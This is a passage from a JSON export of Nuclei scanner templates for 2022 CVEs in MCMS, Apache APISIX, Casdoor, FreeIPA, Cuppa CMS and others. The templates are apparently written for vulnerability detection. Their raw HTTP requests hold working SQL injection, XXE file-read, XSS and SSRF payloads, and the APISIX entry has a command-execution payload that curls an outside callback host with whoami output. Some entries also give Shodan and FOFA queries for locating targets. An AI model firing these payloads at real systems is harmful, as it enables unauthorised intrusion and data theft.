490a0046304402206e4532e227dccab23d15511e741d5332c04c553aec092af6b3f824278ebd18c9022064325bd4ae46cc3b31537d917d6159428ee7cfe953375bb53aac8c2024b8ae2d:922c64590222798bb761d5b6d8e72950", "hash": "9157bbcba92bf957f3936be3c6f0b4ea", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b2" }, "name": "CVE-2022-23898.yaml", "content": "id: CVE-2022-23898\n\ninfo:\n name: MCMS 5.2.5 - SQL Injection\n author: Co5mos\n severity: critical\n description: |\n MCMS 5.2.5 contains a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.5.\n reference:\n - https://github.com/ming-soft/MCMS/issues/62\n - https://github.com/advisories/GHSA-p94q-9q2m-pfh2\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23898\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-23898\n cwe-id: CWE-89\n epss-score: 0.0161\n epss-percentile: 0.87161\n cpe: cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: mingsoft\n product: mcms\n shodan-query: http.favicon.hash:1464851260\n fofa-query: icon_hash=\"1464851260\"\n tags: cve,cve2022,sqli,mcms,mingsoft\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /cms/content/list HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n categoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz\n\n matchers:\n - type: word\n part: body\n words:\n - 'c8c605999f3d8352d7bb792cf3fdb25'\n# digest: 4b0a00483046022100bc573519d97c7e33cb54d6edce45a40fcdb95812ec7800e929a9205d5685fc690221008936ca5aa6d12794cfd449ed310894bcd2cc70e038d631c3e29d6f0157b4b92e:922c64590222798bb761d5b6d8e72950", "hash": "9153d9b9efee6771798a5cc9bbe5a40b", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b3" }, "name": "CVE-2022-23944.yaml", "content": "id: CVE-2022-23944\n\ninfo:\n name: Apache ShenYu Admin Unauth Access\n author: cckuakilong\n severity: critical\n description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Apache ShenYu admin panel.\n remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch.\n reference:\n - https://github.com/apache/incubator-shenyu/pull/2462\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23944\n - https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md\n - https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y\n - http://www.openwall.com/lists/oss-security/2022/01/25/15\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 9.1\n cve-id: CVE-2022-23944\n cwe-id: CWE-306,CWE-862\n epss-score: 0.45887\n epss-percentile: 0.97086\n cpe: cpe:2.3:a:apache:shenyu:2.4.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: shenyu\n tags: cve,cve2022,shenyu,unauth,apache\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/plugin\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"message\":\"query success\"'\n - '\"code\":200'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207d4b54505896da78a61426b82a09c16b3004ec88eaafb319e9154fc6619cf00b0220133dc543f97181df2601ebbfe17254135ff340b3160efb33fad2e75fc4b49dc7:922c64590222798bb761d5b6d8e72950", "hash": "9e8e3b0ec8d6de37f1a45d22c62ce61e", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b4" }, "name": "CVE-2022-24112.yaml", "content": "id: CVE-2022-24112\n\ninfo:\n name: Apache APISIX - Remote Code Execution\n author: Mr-xn\n severity: critical\n description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`).\n reference:\n - https://www.openwall.com/lists/oss-security/2022/02/11/3\n - https://twitter.com/sirifu4k1/status/1496043663704858625\n - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24112\n - http://www.openwall.com/lists/oss-security/2022/02/11/3\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-24112\n cwe-id: CWE-290\n epss-score: 0.97261\n epss-percentile: 0.99825\n cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: apisix\n shodan-query: title:\"Apache APISIX Dashboard\"\n fofa-query: title=\"Apache APISIX Dashboard\"\n tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive\n\nhttp:\n - raw:\n - |\n POST /apisix/batch-requests HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n Accept-Encoding: gzip, deflate\n Accept-Language: zh-CN,zh;q=0.9\n\n {\n \"headers\":{\n \"X-Real-IP\":\"127.0.0.1\",\n \"Content-Type\":\"application/json\"\n },\n \"timeout\":1500,\n \"pipeline\":[\n {\n \"method\":\"PUT\",\n \"path\":\"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\",\n \"body\":\"{\\r\\n \\\"name\\\": \\\"test\\\", \\\"method\\\": [\\\"GET\\\"],\\r\\n \\\"uri\\\": \\\"/api/{{randstr}}\\\",\\r\\n \\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"httpbin.org:80\\\":1}}\\r\\n,\\r\\n\\\"filter_func\\\": \\\"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\\\"}\"\n }\n ]\n }\n - |\n GET /api/{{randstr}} HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept-Language: zh-CN,zh;q=0.9\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_1\n words:\n - '\"reason\":\"OK\"'\n - '\"status\":200'\n condition: and\n\n - type: word\n part: interactsh_protocol\n words:\n - http\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n group: 1\n regex:\n - GET \\/([a-z-]+) HTTP\n part: interactsh_request\n# digest: 4b0a004830460221008ec50579ecb1d58ca336d07a17961f227be3a77e752f3700fee6696537ecfaa7022100bbacb0066289e35e4ed902e5b09dfe5935e1cf61edc477f729c80d7926a6117a:922c64590222798bb761d5b6d8e72950", "hash": "b6479d346a2f34739f42085835575503", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b5" }, "name": "CVE-2022-24124.yaml", "content": "id: CVE-2022-24124\n\ninfo:\n name: Casdoor 1.13.0 - Unauthenticated SQL Injection\n author: cckuailong\n severity: high\n description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.\n remediation: |\n Upgrade to a patched version of Casdoor or apply the necessary security patches to mitigate the SQL injection vulnerability.\n reference:\n - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html\n - https://www.exploit-db.com/exploits/50792\n - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24124\n - https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-24124\n cwe-id: CWE-89\n epss-score: 0.07543\n epss-percentile: 0.93981\n cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: casbin\n product: \"casdoor\"\n shodan-query: http.title:\"Casdoor\"\n tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"XPATH syntax error.*'\"\n - \"casdoor\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ba5ebd65a068d08aa8a9fb4c512f59baa665b2cbe8fa4e25a66a92104f27f415022100d66fba2ed1e2304f9c437470604cb22840501aada5cd30a98bf5d9811b2b07e4:922c64590222798bb761d5b6d8e72950", "hash": "f7eb83771c4dd5eae7c64378c1820ca7", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b6" }, "name": "CVE-2022-24129.yaml", "content": "id: CVE-2022-24129\n\ninfo:\n name: Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery\n author: 0x_Akoko\n severity: high\n description: The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services.\n impact: |\n An attacker can exploit this vulnerability to send crafted requests, potentially leading to unauthorized access to internal resources or information disclosure.\n remediation: |\n Upgrade to Shibboleth OIDC OP version 3.0.4 or later to mitigate the vulnerability.\n reference:\n - https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF\n - https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP\n - http://shibboleth.net/community/advisories/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24129\n - http://shibboleth.net/community/advisories/secadv_20220131.txt\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N\n cvss-score: 8.2\n cve-id: CVE-2022-24129\n cwe-id: CWE-918\n epss-score: 0.00647\n epss-percentile: 0.77074\n cpe: cpe:2.3:a:shibboleth:oidc_op:*:*:*:*:*:identity_provider:*:*\n metadata:\n max-request: 1\n vendor: shibboleth\n product: oidc_op\n framework: identity_provider\n tags: cve,cve2022,ssrf,oidc,shibboleth,identity_provider\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"ShibbolethIdp\"\n# digest: 4a0a004730450221008f7628cf3482df6bb5f6dc923c39a4fd651c4428bbb09c0f117f6b32b15940e402206af2dfa7231ae6a440e9440cc05d63f828a884006f109b865c5046f61b0b8cb6:922c64590222798bb761d5b6d8e72950", "hash": "8242f7cd8cb512ecf1bc04dae21c852f", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b7" }, "name": "CVE-2022-2414.yaml", "content": "id: CVE-2022-2414\n\ninfo:\n name: FreeIPA - XML Entity Injection\n author: DhiyaneshDk\n severity: high\n description: |\n Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server.\n remediation: |\n Apply the latest security patches and updates provided by the vendor to fix the XML Entity Injection vulnerability in FreeIPA.\n reference:\n - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/Dogtag/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2414\n - https://github.com/dogtagpki/pki/pull/4021\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-2414\n cwe-id: CWE-611\n epss-score: 0.01256\n epss-percentile: 0.84092\n cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: dogtagpki\n product: dogtagpki\n shodan-query: title:\"Identity Management\" html:\"FreeIPA\"\n fofa-query: title=\"Identity Management\"\n tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki\n\nhttp:\n - raw:\n - |\n POST /ca/rest/certrequests HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n <!--?xml version=\"1.0\" ?-->\n <!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n <CertEnrollmentRequest>\n <Attributes/>\n <ProfileID>&ent;</ProfileID>\n </CertEnrollmentRequest>\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: word\n part: body\n words:\n - \"PKIException\"\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: status\n status:\n - 400\n# digest: 490a0046304402203e01a48643ddc4111a52d8b34ca90c1d803678990761a21ea7e52dbdcf384f87022053892bd3048fc94077b0f1d151dfade945c5ee5c9fa857c5d0203eca2a47d1cf:922c64590222798bb761d5b6d8e72950", "hash": "8cb92814d2ef3676770bde22be7177af", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b8" }, "name": "CVE-2022-24181.yaml", "content": "id: CVE-2022-24181\n\ninfo:\n name: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting\n author: lucasljm2001,ekrause\n severity: medium\n description: |\n PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to a patched version of PKP Open Journal Systems (OJS) or apply the necessary security patches provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/50881\n - https://github.com/pkp/pkp-lib/issues/7649\n - https://youtu.be/v8-9evO2oVg\n - https://nvd.nist.gov/vuln/detail/cve-2022-24181\n - https://github.com/comrade99/CVE-2022-24181\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-24181\n cwe-id: CWE-79\n epss-score: 0.0017\n epss-percentile: 0.53018\n cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: public_knowledge_project\n product: open_journal_systems\n tags: cve,cve2022,xss,oss,pkp-lib,edb,public_knowledge_project\n\nhttp:\n - raw:\n - |\n GET /iupjournals/index.php/esj HTTP/2\n Host: {{Hostname}}\n X-Forwarded-Host: foo\"><script>alert(document.domain)</script><x=\".com\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<script>alert(document.domain)</script><x=\".com/iupjournals'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220721e675de3dfc8d686deef9d08aa4b511d181ddc1b2d2414d399c6fc0b7984c90220107c7012882d3600ad1a48e96140bd2a811ddc33de21a89217727ff2dab20346:922c64590222798bb761d5b6d8e72950", "hash": "2de8ca08bf99b5a2a0b134a4a75f18d5", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b9" }, "name": "CVE-2022-24223.yaml", "content": "id: CVE-2022-24223\n\ninfo:\n name: Atom CMS v2.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in version Atom CMS v2.1\n reference:\n - https://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html\n - https://github.com/thedigicraft/Atom.CMS/issues/255\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24223\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/Enes4xd/Enes4xd\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-24223\n cwe-id: CWE-89\n epss-score: 0.27442\n epss-percentile: 0.96689\n cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: thedigitalcraft\n product: atomcms\n tags: cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /admin/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n email={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"Admin Login\") && contains(body, \"Atom.SaveOnBlur\")'\n condition: and\n# digest: 4b0a00483046022100b30222427f9ffd0bdc3e9c961d2d43e58bcaaa1c01926b6710eb7a2c2eec31a2022100f35d98eab9372172d960a8d2af85b2b0160b92776eb2f797098acd5ee6cd32fd:922c64590222798bb761d5b6d8e72950", "hash": "562a6dd00b6b2b5c563a99fd340d659e", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ba" }, "name": "CVE-2022-24260.yaml", "content": "id: CVE-2022-24260\n\ninfo:\n name: VoipMonitor - Pre-Auth SQL Injection\n author: gy741\n severity: critical\n description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the SQL injection vulnerability in the VoipMonitor application.\n reference:\n - https://kerbit.io/research/read/blog/3\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24260\n - https://www.voipmonitor.org/changelog-gui?major=5\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-24260\n cwe-id: CWE-89\n epss-score: 0.28138\n epss-percentile: 0.96726\n cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: voipmonitor\n product: voipmonitor\n shodan-query: http.title:\"VoIPmonitor\"\n tags: cve,cve2022,voipmonitor,sqli,unauth\n\nhttp:\n - raw:\n - |\n POST /api.php HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\"success\":true'\n - '_vm_version'\n - '_debug'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: kval\n kval:\n - PHPSESSID\n# digest: 4a0a0047304502205c7937f2712f6a6ba6b8e7005ee21d6e468bad7ca3c51d3878893ccef2720a70022100df3fc30f43920379b57b786480242a3d9d051c85c91ed906d1aff9421526d413:922c64590222798bb761d5b6d8e72950", "hash": "06a886e51e98796dc49245788b750e0b", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084bb" }, "name": "CVE-2022-24264.yaml", "content": "id: CVE-2022-24264\n\ninfo:\n name: Cuppa CMS v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.\n remediation: |\n Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24264\n - https://github.com/truonghuuphuc/CVE\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/Nguyen-Trung-Kien/CVE-1\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-24264\n cwe-id: CWE-89\n epss-score: 0.04717\n epss-percentile: 0.91844\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms\nvariables:\n num: '999999999'\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n POST /components/table_manager/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n search_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - '{{md5(num)}}'\n - 'td_available_languages'\n condition: and\n\n - type: word\n part: header_2\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220736b8973074f85183b4bb813328ec1a114f2ad79d996268f1acae2f5b6faae9f02202b55ebe13f22c216f153f5fd564e50bcbd4499dd04d0e794c9030858c860bed1:922c64590222798bb761d5b6d8e72950", "hash": "b0b5bdaf8fcf4b47e78473dae509ee5c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084bc" }, "name": "CVE-2022-24265.yaml", "content": "id: CVE-2022-24265\n\ninfo:\n name: Cuppa CMS v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.\n remediation: |\n Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24265\n - https://github.com/truonghuuphuc/CVE\n - https://github.com/Nguyen-Trung-Kien/CVE-1\n - https://github.com/oxf5/CVE\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-24265\n cwe-id: CWE-89\n epss-score: 0.05054\n epss-percentile: 0.92726\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: cuppacms\n product: cuppacms\n tags: cve2022,cve,sqli,cuppa,authenticated,cuppacms\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n @timeout: 20s\n POST /components/menu/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n path=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"menu/html/edit.php\")'\n condition: and\n# digest: 4b0a00483046022100ef926993f56df3d6024e815c648f1444430a5c25d5001fa418f66bc26b3f9961022100c18f80d30dbafc9c6af9bcadca69526a5ee1ba114d5c6ec9aa22599cf01ebcc3:922c64590222798bb761d5b6d8e72950", "hash": "eb27d1eff5e2e9ee879f790d16e152c1", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084bd" }, "name": "CVE-2022-24266.yaml", "content": "id: CVE-2022-24266\n\ninfo:\n name: Cuppa CMS v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.\n remediation: |\n Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24266\n - https://github.com/CuppaCMS/CuppaCMS/issues/17\n - https://github.com/truonghuuphuc/CVE\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-24266\n cwe-id: CWE-89\n epss-score: 0.03412\n epss-percentile: 0.91229\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n @timeout: 20s\n POST /components/table_manager/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n order_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"list_admin_table\")'\n condition: and\n# digest: 4a0a00473045022001af995ffcc1fd2b4e63125802fda7806a8bda33d6cde6d71b11627458173c3b022100c28812270e59082397fb8f39eae1d431ad18f591da96014bfaf17017f0691a1f:922c64590222798bb761d5b6d8e72950", "hash": "a826dbec9fdf3742274e94d0eff820c2", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084be" }, "name": "CVE-2022-24288.yaml", "content": "id: CVE-2022-24288\n\ninfo:\n name: Apache Airflow OS Command Injection\n author: xeldax\n severity: high\n description: Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Apache Airflow.\n reference:\n - https://github.com/advisories/GHSA-3v7g-4pg3-7r6j\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24288\n - https://lists.apache.org/thread/dbw5ozcmr0h0lhs0yjph7xdc64oht23t\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Hax0rG1rl/my_cve_and_bounty_poc\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-24288\n cwe-id: CWE-78\n epss-score: 0.81676\n epss-percentile: 